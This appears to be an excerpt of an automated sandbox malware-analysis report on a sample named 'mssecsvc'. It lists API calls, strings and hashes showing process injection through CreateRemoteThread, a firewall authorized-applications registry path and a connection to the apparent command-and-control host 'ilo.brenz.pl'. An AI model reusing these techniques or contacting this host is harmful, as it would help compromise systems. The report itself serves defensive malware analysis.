                                                                                                                                                  • Part of subcall function 00AC3D1F: lstrcat.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,00AC3D12), ref: 00AC3D20
                                                                                                                                                  • Part of subcall function 00AC3D1F: GetProcAddress.KERNEL32(00000000,00AC3D41), ref: 00AC3D4C
                                                                                                                                                  • Part of subcall function 00AC3D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AC3D5F
                                                                                                                                                  • Part of subcall function 00AC3D1F: GetTickCount.KERNEL32 ref: 00AC3D93
                                                                                                                                                  • Part of subcall function 00AC3D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AC6EF6,00000000,00000000,00000000,00000000), ref: 00AC3E65
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                                                                                • API String ID: 215653160-3999816838
                                                                                                                                                • Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                                                                                                                                                • Instruction ID: 300dc2e70911624c4798ccc50677d5959064c040c3365b7c78012bb061d11580
                                                                                                                                                • Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
                                                                                                                                                • Instruction Fuzzy Hash: F5E10172408248BFEF259F248C5AFEA7BACEF41300F06455DEC4A9E082D6F45F4587A5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA3D1F Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 389stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • lstrcat.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,7FEA3D12), ref: 7FEA3D20
                                                                                                                                                  • Part of subcall function 7FEA3D36: LoadLibraryA.KERNEL32(7FEA3D2B), ref: 7FEA3D36
                                                                                                                                                  • Part of subcall function 7FEA3D36: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                                                                                  • Part of subcall function 7FEA3D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                                                                                  • Part of subcall function 7FEA3D36: GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                                                                                  • Part of subcall function 7FEA3D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                                                                                                                                                • API String ID: 2038497427-2923680188
                                                                                                                                                • Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                                                                                                                                                • Instruction ID: aa1c8551e8f76fbb525208f0bea2f920101e632125f5267fb1ed65396364aa08
                                                                                                                                                • Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                                                                                                                                                • Instruction Fuzzy Hash: A2E1F071419348BFEB229F748C4ABFA7BACEF42304F004559E84A9E081DAF66F059765
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC3D1F Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 389stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • lstrcat.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,00AC3D12), ref: 00AC3D20
                                                                                                                                                  • Part of subcall function 00AC3D36: LoadLibraryA.KERNEL32(00AC3D2B), ref: 00AC3D36
                                                                                                                                                  • Part of subcall function 00AC3D36: GetProcAddress.KERNEL32(00000000,00AC3D41), ref: 00AC3D4C
                                                                                                                                                  • Part of subcall function 00AC3D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AC3D5F
                                                                                                                                                  • Part of subcall function 00AC3D36: GetTickCount.KERNEL32 ref: 00AC3D93
                                                                                                                                                  • Part of subcall function 00AC3D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AC6EF6,00000000,00000000,00000000,00000000), ref: 00AC3E65
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                                                                                • API String ID: 2038497427-3999816838
                                                                                                                                                • Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                                                                                                                                                • Instruction ID: 4ade996946205155614f7ba88722abb3cb745b155a53f503ee0e4ca1bdc71565
                                                                                                                                                • Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
                                                                                                                                                • Instruction Fuzzy Hash: 02E1FF72508248BFEF25AF248C5AFEA7BACEF41300F06455DEC4A9E082D6F45F4587A5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA3D36 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 379libraryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(7FEA3D2B), ref: 7FEA3D36
                                                                                                                                                  • Part of subcall function 7FEA3D4B: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                                                                                  • Part of subcall function 7FEA3D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                                                                                  • Part of subcall function 7FEA3D4B: GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                                                                                  • Part of subcall function 7FEA3D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$AddressCountInformationProcTickVolume
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                                                                                                                                                • API String ID: 3734769084-2923680188
                                                                                                                                                • Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                                                                                                                                                • Instruction ID: 04a7c8116a9fb35f71bbffa2808c6274a5c5ffd0f068440cbef2dd7623ef1827
                                                                                                                                                • Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                                                                                                                                                • Instruction Fuzzy Hash: 9DD10071419348BFEB229F748C4ABFA7BACEF41304F004519E84A9E091DBF66F059765
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC3D36 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 379libraryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(00AC3D2B), ref: 00AC3D36
                                                                                                                                                  • Part of subcall function 00AC3D4B: GetProcAddress.KERNEL32(00000000,00AC3D41), ref: 00AC3D4C
                                                                                                                                                  • Part of subcall function 00AC3D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AC3D5F
                                                                                                                                                  • Part of subcall function 00AC3D4B: GetTickCount.KERNEL32 ref: 00AC3D93
                                                                                                                                                  • Part of subcall function 00AC3D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AC6EF6,00000000,00000000,00000000,00000000), ref: 00AC3E65
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$AddressCountInformationProcTickVolume
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                                                                                • API String ID: 3734769084-3999816838
                                                                                                                                                • Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                                                                                                                                                • Instruction ID: a2a5be16d0f9009bfdc587255d2e4c0d6226cab3545a9c618f876dcd14acdd72
                                                                                                                                                • Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                                                                                                                                                • Instruction Fuzzy Hash: 5ED1EF72508248BFEF35AF248C5AFEA7BACEF45300F06451DE84A9E082D6F45F4587A5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA3D4B Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 386librarythreadnetworkCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                                                                                • GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 7FEA3EE2
                                                                                                                                                • wsprintfA.USER32 ref: 7FEA3EF7
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                                                                                                                                                • CloseHandle.KERNEL32(?,E81213EA), ref: 7FEA3F49
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                                                                                • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                                                                                • SetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA42D6
                                                                                                                                                • Sleep.KERNEL32(00007530,?,00000000), ref: 7FEA42F7
                                                                                                                                                • ResetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA430A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                                                                                                                                                • API String ID: 1567941233-2923680188
                                                                                                                                                • Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                                                                                                                                                • Instruction ID: 0fd1af5c82e6ac19fee7a4e27b5b7e3d4aaa516ddc9e53bac77035a7f4224d32
                                                                                                                                                • Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                                                                                                                                                • Instruction Fuzzy Hash: BBE1EF71419348BFEB229F748C4ABFA7BACEF41304F00465AEC4A9E081D6F66F059761
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC3D4B Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 386librarythreadnetworkCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00AC3D41), ref: 00AC3D4C
                                                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AC3D5F
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00AC3D93
                                                                                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AC6EF6,00000000,00000000,00000000,00000000), ref: 00AC3E65
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 00AC3EE2
                                                                                                                                                • wsprintfA.USER32 ref: 00AC3EF7
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00AC3691,00000000,00000000), ref: 00AC3F40
                                                                                                                                                • CloseHandle.KERNEL32(?,E81213EA), ref: 00AC3F49
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AC3FE9
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00AC3FF2
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AC3FFF
                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00AC4097
                                                                                                                                                • connect.WS2_32(6F6C6902,00AC3B09,00000010), ref: 00AC40B1
                                                                                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00AC40FB
                                                                                                                                                • wsprintfA.USER32 ref: 00AC4179
                                                                                                                                                • SetEvent.KERNEL32(000002A0,?,00000000), ref: 00AC42D6
                                                                                                                                                • Sleep.KERNEL32(00007530,?,00000000), ref: 00AC42F7
                                                                                                                                                • ResetEvent.KERNEL32(000002A0,?,00000000), ref: 00AC430A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                                                                                • API String ID: 1567941233-3999816838
                                                                                                                                                • Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                                                                                                                                                • Instruction ID: 5c182fb308665e4bb8b3c2b648f8f88135ea83022802bae36458e07fd6d52dfc
                                                                                                                                                • Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                                                                                                                                                • Instruction Fuzzy Hash: 8EE1FF72404248BEEF21AF248C5AFEA7BACEF45300F06455DEC499E082D6F45F45C7A5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA042D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 7FEA04BE
                                                                                                                                                • GetVersion.KERNEL32 ref: 7FEA0500
                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 7FEA0528
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 7FEA05AD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Handle$AllocCloseModuleVersionVirtual
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt$\BaseNamedObjects\axytVt$csrs
                                                                                                                                                • API String ID: 3017432202-8628898
                                                                                                                                                • Opcode ID: 5e26fa20f83f5e6203321ab9e5c6cfdbb76e6a20a0cc65ba3ebce16670a95049
                                                                                                                                                • Instruction ID: 376c8b8ebe22387fcb6572217874645f2f634c1d8e6058b442ff8ca82ff501ab
                                                                                                                                                • Opcode Fuzzy Hash: 5e26fa20f83f5e6203321ab9e5c6cfdbb76e6a20a0cc65ba3ebce16670a95049
                                                                                                                                                • Instruction Fuzzy Hash: 37B19E71506349FFEB229F24C849BFA3BA9FF45715F000128EA0A9E181C7F29B45CB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA05F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193stringnativeprocessCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 7FEA05AD
                                                                                                                                                • GetModuleHandleA.KERNEL32(7FEA05EC), ref: 7FEA05F2
                                                                                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\axytVt,\BaseNamedObjects\axytVt), ref: 7FEA070A
                                                                                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\axytVt,?), ref: 7FEA072D
                                                                                                                                                • lstrcatW.KERNEL32(\BaseNamedObjects\axytVt,\axytVt), ref: 7FEA073B
                                                                                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 7FEA076B
                                                                                                                                                • NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 7FEA0786
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 7FEA07C9
                                                                                                                                                • Process32First.KERNEL32 ref: 7FEA07DC
                                                                                                                                                • Process32Next.KERNEL32 ref: 7FEA07ED
                                                                                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA0805
                                                                                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FEA0842
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA085D
                                                                                                                                                • CloseHandle.KERNEL32 ref: 7FEA086C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt$\BaseNamedObjects\axytVt$csrs
                                                                                                                                                • API String ID: 1545766225-8628898
                                                                                                                                                • Opcode ID: 587852de3d39a4d695cdbfc1c95892cdb4d54edcd7c040a1b51e64314113049a
                                                                                                                                                • Instruction ID: 2b4be82ea446db3c5a55f458cbae40a8dee7889a1131c82c6500b60ec9c55621
                                                                                                                                                • Opcode Fuzzy Hash: 587852de3d39a4d695cdbfc1c95892cdb4d54edcd7c040a1b51e64314113049a
                                                                                                                                                • Instruction Fuzzy Hash: 47716D31505205FFEB219F20CC49BBE3BBEEF85715F100068EA0A9E090C7B69F459B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 7FEA4178 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 192networksleepstringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                                                                                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                                                                                • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                                                                                                                                                • GetTickCount.KERNEL32 ref: 7FEA41F6
                                                                                                                                                • Sleep.KERNEL32(00000064,?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA428B
                                                                                                                                                • GetTickCount.KERNEL32 ref: 7FEA4294
                                                                                                                                                • closesocket.WS2_32(6F6C6902), ref: 7FEA42B8
                                                                                                                                                • SetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA42D6
                                                                                                                                                • Sleep.KERNEL32(00007530,?,00000000), ref: 7FEA42F7
                                                                                                                                                • ResetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA430A
                                                                                                                                                Strings
                                                                                                                                                • C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 7FEA4178, 7FEA4195, 7FEA41DB
                                                                                                                                                • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
                                                                                                                                                • String ID: C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$\DEVICE\AFD\ENDPOINT
                                                                                                                                                • API String ID: 883794535-1462811877
                                                                                                                                                • Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                                                                                                                                                • Instruction ID: 62042b7e1d70db51705c832b3ce7fc9885254b828fc8a61664828cce23236026
                                                                                                                                                • Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                                                                                                                                                • Instruction Fuzzy Hash: AD71EF75508348BAEB229F3488587EEBFAEEF81314F000608E85A9E1D1C7F66F45D761
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00AC4178 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 192networksleepstringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00AC4057
                                                                                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 00AC4066
                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00AC4097
                                                                                                                                                • connect.WS2_32(6F6C6902,00AC3B09,00000010), ref: 00AC40B1
                                                                                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00AC40FB
                                                                                                                                                • wsprintfA.USER32 ref: 00AC4179
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00AC41B4
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,00AC6AA2,00000000,00000000), ref: 00AC41BD
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00AC41F6
                                                                                                                                                • Sleep.KERNEL32(00000064,?,00000000,6F6C6902,00AC6AA2,00000000,00000000), ref: 00AC428B
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00AC4294
                                                                                                                                                • closesocket.WS2_32(6F6C6902), ref: 00AC42B8
                                                                                                                                                • SetEvent.KERNEL32(000002A0,?,00000000), ref: 00AC42D6
                                                                                                                                                • Sleep.KERNEL32(00007530,?,00000000), ref: 00AC42F7
                                                                                                                                                • ResetEvent.KERNEL32(000002A0,?,00000000), ref: 00AC430A
                                                                                                                                                Strings
                                                                                                                                                • C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 00AC4178, 00AC4195, 00AC41DB
